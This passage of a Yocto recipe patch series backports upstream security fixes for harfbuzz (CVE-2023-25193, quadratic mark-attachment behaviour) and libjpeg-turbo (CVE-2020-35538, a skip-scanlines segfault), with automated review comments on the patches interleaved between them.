++ * flag is not present, then it is safe to break
++ * the glyph-run at the beginning of this
++ * cluster, and the two sides will represent the
++ * exact same result one would get if breaking
++ * input text at the beginning of this cluster
++ * and shaping the two sides separately.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking.
++ *
++ * @HB_GLYPH_FLAG_UNSAFE_TO_CONCAT: Indicates that if input text is changed on one
++ * side of the beginning of the cluster this glyph
++ * is part of, then the shaping results for the
++ * other side might change.
++ *
++ * Note that the absence of this flag will NOT by
++ * itself mean that it IS safe to concat text.
++ * Only two pieces of text both of which clear of
++ * this flag can be concatenated safely.
++ *
++ * This can be used to optimize paragraph
++ * layout, by avoiding re-shaping of each line
++ * after line-breaking, by limiting the
++ * reshaping to a small piece around the
++ * breaking positin only, even if the breaking
++ * position carries the
++ * #HB_GLYPH_FLAG_UNSAFE_TO_BREAK or when
++ * hyphenation or other text transformation
++ * happens at line-break position, in the following
++ * way:
++ *
++ * 1. Iterate back from the line-break position till
++ * the the first cluster start position that is
++ * NOT unsafe-to-concat, 2. shape the segment from
++ * there till the end of line, 3. check whether the
++ * resulting glyph-run also is clear of the
++ * unsafe-to-concat at its start-of-text position;
++ * if it is, just splice it into place and the line
++ * is shaped; If not, move on to a position further
++ * back that is clear of unsafe-to-concat and retry
++ * from there, and repeat.
++ *
++ * At the start of next line a similar algorithm can
++ * be implemented. A slight complication will arise,
++ * because while our buffer API has a way to
++ * return flags for position corresponding to
++ * start-of-text, there is currently no position
++ * corresponding to end-of-text. This limitation
++ * can be alleviated by shaping more text than needed
++ * and looking for unsafe-to-concat flag within text
++ * clusters.
++ *
++ * The #HB_GLYPH_FLAG_UNSAFE_TO_BREAK flag will
++ * always imply this flag.
++ *
++ * Since: REPLACEME
++ *
+ * @HB_GLYPH_FLAG_DEFINED: All the currently defined flags.
+ *
+ * Since: 1.5.0
+ */
+ typedef enum { /*< flags >*/
+ HB_GLYPH_FLAG_UNSAFE_TO_BREAK = 0x00000001,
++ HB_GLYPH_FLAG_UNSAFE_TO_CONCAT = 0x00000002,
+
+- HB_GLYPH_FLAG_DEFINED = 0x00000001 /* OR of all defined flags */
++ HB_GLYPH_FLAG_DEFINED = 0x00000003 /* OR of all defined flags */
+ } hb_glyph_flags_t;
+
+ HB_EXTERN hb_glyph_flags_t
+diff --git a/src/hb-buffer.hh b/src/hb-buffer.hh
+index b5596d9..beac7b6 100644
+--- a/src/hb-buffer.hh
++++ b/src/hb-buffer.hh
+@@ -67,8 +67,8 @@ enum hb_buffer_scratch_flags_t {
+ HB_BUFFER_SCRATCH_FLAG_HAS_DEFAULT_IGNORABLES = 0x00000002u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_SPACE_FALLBACK = 0x00000004u,
+ HB_BUFFER_SCRATCH_FLAG_HAS_GPOS_ATTACHMENT = 0x00000008u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK = 0x00000010u,
+- HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000020u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_CGJ = 0x00000010u,
++ HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS = 0x00000020u,
+
+ /* Reserved for complex shapers' internal use. */
+ HB_BUFFER_SCRATCH_FLAG_COMPLEX0 = 0x01000000u,
+@@ -324,8 +324,19 @@ struct hb_buffer_t
+ return;
+ unsafe_to_break_impl (start, end);
+ }
+- HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end);
+- HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end);
++ void unsafe_to_concat (unsigned int start,
++ unsigned int end)
++ {
++ if (end - start < 2)
++ return;
++ unsafe_to_break_impl (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ }
++ HB_INTERNAL void unsafe_to_break_impl (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ HB_INTERNAL void unsafe_to_break_from_outbuffer (unsigned int start, unsigned int end,
++ hb_mask_t mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK | HB_GLYPH_FLAG_UNSAFE_TO_CONCAT);
++ void unsafe_to_concat_from_outbuffer (unsigned int start, unsigned int end)
++ { unsafe_to_break_from_outbuffer (start, end, HB_GLYPH_FLAG_UNSAFE_TO_CONCAT); }
+
+
+ /* Internal methods */
+@@ -377,12 +388,7 @@ struct hb_buffer_t
+ set_cluster (hb_glyph_info_t &inf, unsigned int cluster, unsigned int mask = 0)
+ {
+ if (inf.cluster != cluster)
+- {
+- if (mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- inf.mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- else
+- inf.mask &= ~HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- }
++ inf.mask = (inf.mask & ~HB_GLYPH_FLAG_DEFINED) | (mask & HB_GLYPH_FLAG_DEFINED);
+ inf.cluster = cluster;
+ }
+
+@@ -398,13 +404,14 @@ struct hb_buffer_t
+ void
+ _unsafe_to_break_set_mask (hb_glyph_info_t *infos,
+ unsigned int start, unsigned int end,
+- unsigned int cluster)
++ unsigned int cluster,
++ hb_mask_t mask)
+ {
+ for (unsigned int i = start; i < end; i++)
+ if (cluster != infos[i].cluster)
+ {
+- scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK;
+- infos[i].mask |= HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
++ scratch_flags |= HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS;
++ infos[i].mask |= mask;
+ }
+ }
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 579d178..a6ca456 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,7 +369,7 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
+- bool next ()
++ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+@@ -392,11 +392,17 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
+ return false;
++ }
+ }
++ if (unsafe_to)
++ *unsafe_to = end;
+ return false;
+ }
+- bool prev ()
++ bool prev (unsigned *unsafe_from = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx > num_items - 1)
+@@ -419,8 +425,14 @@ struct hb_ot_apply_context_t :
+ }
+
+ if (skip == matcher_t::SKIP_NO)
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
+ return false;
++ }
+ }
++ if (unsafe_from)
++ *unsafe_from = 0;
+ return false;
+ }
+
+@@ -834,7 +846,12 @@ static inline bool match_input (hb_ot_apply_context_t *c,
+ match_positions[0] = buffer->idx;
+ for (unsigned int i = 1; i < count; i++)
+ {
+- if (!skippy_iter.next ()) return_trace (false);
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx, unsafe_to);
++ return_trace (false);
++ }
+
+ match_positions[i] = skippy_iter.idx;
+
+@@ -1022,8 +1039,14 @@ static inline bool match_backtrack (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, backtrack);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.prev ())
++ {
++ unsigned unsafe_from;
++ if (!skippy_iter.prev (&unsafe_from))
++ {
++ c->buffer->unsafe_to_concat_from_outbuffer (unsafe_from, c->buffer->idx);
+ return_trace (false);
++ }
++ }
+
+ *match_start = skippy_iter.idx;
+
+@@ -1045,8 +1068,14 @@ static inline bool match_lookahead (hb_ot_apply_context_t *c,
+ skippy_iter.set_match_func (match_func, match_data, lookahead);
+
+ for (unsigned int i = 0; i < count; i++)
+- if (!skippy_iter.next ())
++ {
++ unsigned unsafe_to;
++ if (!skippy_iter.next (&unsafe_to))
++ {
++ c->buffer->unsafe_to_concat (c->buffer->idx + offset, unsafe_to);
+ return_trace (false);
++ }
++ }
+
+ *end_index = skippy_iter.idx + 1;
+
+diff --git a/src/hb-ot-shape.cc b/src/hb-ot-shape.cc
+index 5d9a70c..5d10b30 100644
+--- a/src/hb-ot-shape.cc
++++ b/src/hb-ot-shape.cc
+@@ -1008,7 +1008,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ /* Propagate cluster-level glyph flags to be the same on all cluster glyphs.
+ * Simplifies using them. */
+
+- if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_UNSAFE_TO_BREAK))
++ if (!(buffer->scratch_flags & HB_BUFFER_SCRATCH_FLAG_HAS_GLYPH_FLAGS))
+ return;
+
+ hb_glyph_info_t *info = buffer->info;
+@@ -1017,11 +1017,7 @@ hb_propagate_flags (hb_buffer_t *buffer)
+ {
+ unsigned int mask = 0;
+ for (unsigned int i = start; i < end; i++)
+- if (info[i].mask & HB_GLYPH_FLAG_UNSAFE_TO_BREAK)
+- {
+- mask = HB_GLYPH_FLAG_UNSAFE_TO_BREAK;
+- break;
+- }
++ mask |= info[i].mask & HB_GLYPH_FLAG_DEFINED;
+ if (mask)
+ for (unsigned int i = start; i < end; i++)
+ info[i].mask |= mask;
+--
+2.25.1
+
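Review bot: This prerequisite changes the public header, not only internals. `hb-buffer.h` gains `HB_GLYPH_FLAG_UNSAFE_TO_CONCAT = 0x00000002`, `HB_GLYPH_FLAG_DEFINED` widens to `0x00000003`, and `set_cluster` and `hb_propagate_flags` now carry both bits, so consumers of glyph flags can see a value they did not see before on this stable version. The patch header should say so, and the documentation block still carries the upstream placeholder `Since: REPLACEME`. In `hb-buffer.cc` the lines between the two hunks are not shown. If the `!have_output` branch of `unsafe_to_break_from_outbuffer` still calls `unsafe_to_break_impl (start, end)` without forwarding `mask`, then `unsafe_to_concat_from_outbuffer` would set both flags on that path, which is conservative but worth confirming.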
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
new file mode 100644
index 0000000000..4994e0ef68
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch
@@ -0,0 +1,135 @@
+From b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 13:08:52 -0700
+Subject: [PATCH] [gsubgpos] Refactor skippy_iter.match()
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/b29fbd16fa82b82bdf0dcb2f13a63f7dc23cf324]
+Comment1: To backport the fix for CVE-2023-25193, add defination for MATCH, NOT_MATCH and SKIP.
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/hb-ot-layout-gsubgpos.hh | 94 +++++++++++++++++++++---------------
+ 1 file changed, 54 insertions(+), 40 deletions(-)
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index a6ca456..5a7e564 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -369,33 +369,52 @@ struct hb_ot_apply_context_t :
+ may_skip (const hb_glyph_info_t &info) const
+ { return matcher.may_skip (c, info); }
+
++ enum match_t {
++ MATCH,
++ NOT_MATCH,
++ SKIP
++ };
++
++ match_t match (hb_glyph_info_t &info)
++ {
++ matcher_t::may_skip_t skip = matcher.may_skip (c, info);
++ if (unlikely (skip == matcher_t::SKIP_YES))
++ return SKIP;
++
++ matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
++ if (match == matcher_t::MATCH_YES ||
++ (match == matcher_t::MATCH_MAYBE &&
++ skip == matcher_t::SKIP_NO))
++ return MATCH;
++
++ if (skip == matcher_t::SKIP_NO)
++ return NOT_MATCH;
++
++ return SKIP;
++ }
++
+ bool next (unsigned *unsafe_to = nullptr)
+ {
+ assert (num_items > 0);
+ while (idx + num_items < end)
+ {
+ idx++;
+- const hb_glyph_info_t &info = c->buffer->info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
+- {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
++ switch (match (c->buffer->info[idx]))
+ {
+- if (unsafe_to)
+- *unsafe_to = idx + 1;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_to)
++ *unsafe_to = idx + 1;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_to)
+@@ -408,27 +427,22 @@ struct hb_ot_apply_context_t :
+ while (idx > num_items - 1)
+ {
+ idx--;
+- const hb_glyph_info_t &info = c->buffer->out_info[idx];
+-
+- matcher_t::may_skip_t skip = matcher.may_skip (c, info);
+- if (unlikely (skip == matcher_t::SKIP_YES))
+- continue;
+-
+- matcher_t::may_match_t match = matcher.may_match (info, match_glyph_data);
+- if (match == matcher_t::MATCH_YES ||
+- (match == matcher_t::MATCH_MAYBE &&
+- skip == matcher_t::SKIP_NO))
++ switch (match (c->buffer->out_info[idx]))
+ {
+- num_items--;
+- if (match_glyph_data) match_glyph_data++;
+- return true;
+- }
+-
+- if (skip == matcher_t::SKIP_NO)
+- {
+- if (unsafe_from)
+- *unsafe_from = hb_max (1u, idx) - 1u;
+- return false;
++ case MATCH:
++ {
++ num_items--;
++ if (match_glyph_data) match_glyph_data++;
++ return true;
++ }
++ case NOT_MATCH:
++ {
++ if (unsafe_from)
++ *unsafe_from = hb_max (1u, idx) - 1u;
++ return false;
++ }
++ case SKIP:
++ continue;
+ }
+ }
+ if (unsafe_from)
+--
+2.25.1
+
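Review bot: The new `match()` helper takes `hb_glyph_info_t &info` although it only reads the glyph, whereas the code it replaces in `next()` and `prev()` bound `const hb_glyph_info_t &info` before calling `may_skip` and `may_match`. Declaring it as `match_t match (const hb_glyph_info_t &info)` would keep the read-only contract the removed lines had. Because this is a backport, the patch header would need to record that change as a deviation from the upstream commit. `next()` and `prev()` both begin or end outside the hunks shown.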
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
new file mode 100644
index 0000000000..e4ac13dbad
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
@@ -0,0 +1,179 @@
+From 9c8e972dbecda93546038d24444d8216397d75a3 Mon Sep 17 00:00:00 2001
+From: Behdad Esfahbod <behdad@behdad.org>
+Date: Mon, 6 Feb 2023 14:51:25 -0700
+Subject: [PATCH] [GPOS] Avoid O(n^2) behavior in mark-attachment
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/8708b9e081192786c027bb7f5f23d76dbe5c19e8]
+Comment1: The Original Patch [https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc] causes regression and was reverted. This Patch completes the fix.
+Comment2: The Patch contained files MarkBasePosFormat1.hh and MarkLigPosFormat1.hh which were moved from hb-ot-layout-gpos-table.hh as per https://github.com/harfbuzz/harfbuzz/commit/197d9a5c994eb41c8c89b7b958b26b1eacfeeb00
+CVE: CVE-2023-25193
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ src/hb-ot-layout-gpos-table.hh | 103 +++++++++++++++++++++++----------
+ src/hb-ot-layout-gsubgpos.hh | 5 +-
+ 2 files changed, 78 insertions(+), 30 deletions(-)
+
+diff --git a/src/hb-ot-layout-gpos-table.hh b/src/hb-ot-layout-gpos-table.hh
+index 024312d..db5f9ae 100644
+--- a/src/hb-ot-layout-gpos-table.hh
++++ b/src/hb-ot-layout-gpos-table.hh
+@@ -1458,6 +1458,25 @@ struct MarkBasePosFormat1
+
+ const Coverage &get_coverage () const { return this+markCoverage; }
+
++ static inline bool accept (hb_buffer_t *buffer, unsigned idx)
++ {
++ /* We only want to attach to the first of a MultipleSubst sequence.
++ * https://github.com/harfbuzz/harfbuzz/issues/740
++ * Reject others...
++ * ...but stop if we find a mark in the MultipleSubst sequence:
++ * https://github.com/harfbuzz/harfbuzz/issues/1020 */
++ return !_hb_glyph_info_multiplied (&buffer->info[idx]) ||
++ 0 == _hb_glyph_info_get_lig_comp (&buffer->info[idx]) ||
++ (idx == 0 ||
++ _hb_glyph_info_is_mark (&buffer->info[idx - 1]) ||
++ !_hb_glyph_info_multiplied (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_id (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_id (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx - 1]) + 1
++ );
++ }
++
+ bool apply (hb_ot_apply_context_t *c) const
+ {
+ TRACE_APPLY (this);
+@@ -1465,37 +1484,46 @@ struct MarkBasePosFormat1
+ unsigned int mark_index = (this+markCoverage).get_coverage (buffer->cur().codepoint);
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+- /* Now we search backwards for a non-mark glyph */
++ /* Now we search backwards for a non-mark glyph.
++ * We don't use skippy_iter.prev() to avoid O(n^2) behavior. */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- do {
+- if (!skippy_iter.prev ()) return_trace (false);
+- /* We only want to attach to the first of a MultipleSubst sequence.
+- * https://github.com/harfbuzz/harfbuzz/issues/740
+- * Reject others...
+- * ...but stop if we find a mark in the MultipleSubst sequence:
+- * https://github.com/harfbuzz/harfbuzz/issues/1020 */
+- if (!_hb_glyph_info_multiplied (&buffer->info[skippy_iter.idx]) ||
+- 0 == _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) ||
+- (skippy_iter.idx == 0 ||
+- _hb_glyph_info_is_mark (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx - 1]) + 1
+- ))
+- break;
+- skippy_iter.reject ();
+- } while (true);
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ if (!accept (buffer, j - 1))
++ match = skippy_iter.SKIP;
++ }
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ unsigned idx = (unsigned) c->last_base;
+
+ /* Checking that matched glyph is actually a base glyph by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_base_glyph (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_base_glyph (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[skippy_iter.idx].codepoint);
+- if (base_index == NOT_COVERED) return_trace (false);
++ unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[idx].codepoint);
++ if (base_index == NOT_COVERED)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (idx, buffer->idx + 1);
++ return_trace (false);
++ }
+
+- return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, skippy_iter.idx));
++ return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, idx));
+ }
+
+ bool subset (hb_subset_context_t *c) const
+@@ -1587,15 +1615,32 @@ struct MarkLigPosFormat1
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+ /* Now we search backwards for a non-mark glyph */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- if (!skippy_iter.prev ()) return_trace (false);
++
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ j = (unsigned) c->last_base;
+
+ /* Checking that matched glyph is actually a ligature by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_ligature (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_ligature (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int j = skippy_iter.idx;
+ unsigned int lig_index = (this+ligatureCoverage).get_coverage (buffer->info[j].codepoint);
+ if (lig_index == NOT_COVERED) return_trace (false);
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 5a7e564..437123c 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -503,6 +503,9 @@ struct hb_ot_apply_context_t :
+ uint32_t random_state;
+
+
++ signed last_base = -1; // GPOS uses
++ unsigned last_base_until = 0; // GPOS uses
++
+ hb_ot_apply_context_t (unsigned int table_index_,
+ hb_font_t *font_,
+ hb_buffer_t *buffer_) :
+@@ -536,7 +539,7 @@ struct hb_ot_apply_context_t :
+ iter_context.init (this, true);
+ }
+
+- void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; init_iters (); }
++ void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; last_base = -1; last_base_until = 0; init_iters (); }
+ void set_auto_zwj (bool auto_zwj_) { auto_zwj = auto_zwj_; init_iters (); }
+ void set_auto_zwnj (bool auto_zwnj_) { auto_zwnj = auto_zwnj_; init_iters (); }
+ void set_random (bool random_) { random = random_; }
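Review bot: The cached `c->last_base` / `c->last_base_until` pair used by the new backward loops in `MarkBasePosFormat1::apply` and `MarkLigPosFormat1::apply` is reset only in `set_lookup_mask`, and neither loop checks that `last_base_until` is still at or below `buffer->idx`. If a pass ever starts at a lower index without going through `set_lookup_mask` (not visible from these hunks), the loop body is skipped and a stale `last_base` is used to index `buffer->info`. A guard before each loop, `if (c->last_base_until > buffer->idx) { c->last_base_until = 0; c->last_base = -1; }`, would stop the cache from outliving the position it was computed for. Separately, the `MarkLigPosFormat1` path returns on `lig_index == NOT_COVERED` without the `unsafe_to_concat_from_outbuffer` call that the `MarkBasePosFormat1` path makes, and the extracted `accept()` adds a `!_hb_glyph_info_multiplied (&buffer->info[idx - 1])` term that the removed 2.6.4 condition did not have; both differences deserve a line in the patch header. Both `apply` bodies continue outside the hunks shown.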
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
index ee08c12bee..0cfe01f1e5 100644
--- a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
@@ -7,7 +7,10 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=e11f5c3149cdec4bb309babb020b32b9 \
file://src/hb-ucd.cc;beginline=1;endline=15;md5=29d4dcb6410429195df67efe3382d8bc"
-SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz"
+SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz \
+ file://CVE-2023-25193-pre0.patch \
+ file://CVE-2023-25193-pre1.patch \
+ file://CVE-2023-25193.patch"
SRC_URI[md5sum] = "2b3a4dfdb3e5e50055f941978944da9f"
SRC_URI[sha256sum] = "9413b8d96132d699687ef914ebb8c50440efc87b3f775d25856d7ec347c03c12"
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
new file mode 100644
index 0000000000..8a52ed01e9
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
@@ -0,0 +1,457 @@
+From 9120a247436e84c0b4eea828cb11e8f665fcde30 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 23 Jul 2020 21:24:38 -0500
+Subject: [PATCH] Fix jpeg_skip_scanlines() segfault w/merged upsamp
+
+The additional segfault mentioned in #244 was due to the fact that
+the merged upsamplers use a different private structure than the
+non-merged upsamplers. jpeg_skip_scanlines() was assuming the latter, so
+when merged upsampling was enabled, jpeg_skip_scanlines() clobbered one
+of the IDCT method pointers in the merged upsampler's private structure.
+
+For reasons unknown, the test image in #441 did not encounter this
+segfault (too small?), but it encountered an issue similar to the one
+fixed in 5bc43c7821df982f65aa1c738f67fbf7cba8bd69, whereby it was
+necessary to set up a dummy postprocessing function in
+read_and_discard_scanlines() when merged upsampling was enabled.
+Failing to do so caused either a segfault in merged_2v_upsample() (due
+to a NULL pointer being passed to jcopy_sample_rows()) or an error
+("Corrupt JPEG data: premature end of data segment"), depending on the
+number of scanlines skipped and whether the first scanline skipped was
+an odd- or even-numbered row.
+
+Fixes #441
+Fixes #244 (for real this time)
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog.md | 7 +++++
+ jdapistd.c | 72 ++++++++++++++++++++++++++++++++++++++++++++++------
+ jdmerge.c | 46 +++++++--------------------------
+ jdmerge.h | 47 ++++++++++++++++++++++++++++++++++
+ jdmrg565.c | 10 ++++----
+ jdmrgext.c | 6 ++---
+ 6 files changed, 135 insertions(+), 53 deletions(-)
+ create mode 100644 jdmerge.h
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 2ebfe71..19d18fa 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,6 +54,13 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+
++2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
++in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
++images using the merged (non-fancy) upsampling algorithms (that is, when
++setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
++but it did not cover all cases.
++
++
+ 2.0.3
+ =====
+
+diff --git a/jdapistd.c b/jdapistd.c
+index 2c808fa..91da642 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -21,6 +21,8 @@
+ #include "jinclude.h"
+ #include "jdmainct.h"
+ #include "jdcoefct.h"
++#include "jdmaster.h"
++#include "jdmerge.h"
+ #include "jdsample.h"
+ #include "jmemsys.h"
+
+@@ -304,6 +306,16 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+
+
++/* Dummy postprocessing function used by jpeg_skip_scanlines() */
++LOCAL(void)
++noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION *in_row_group_ctr,
++ JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
++ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
++{
++}
++
++
+ /*
+ * In some cases, it is best to call jpeg_read_scanlines() and discard the
+ * output, rather than skipping the scanlines, because this allows us to
+@@ -316,11 +328,17 @@ LOCAL(void)
+ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ JDIMENSION n;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
+ void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION input_row, JSAMPARRAY output_buf,
+ int num_rows) = NULL;
+ void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ JSAMPARRAY output_buf, int num_rows) = NULL;
++ void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
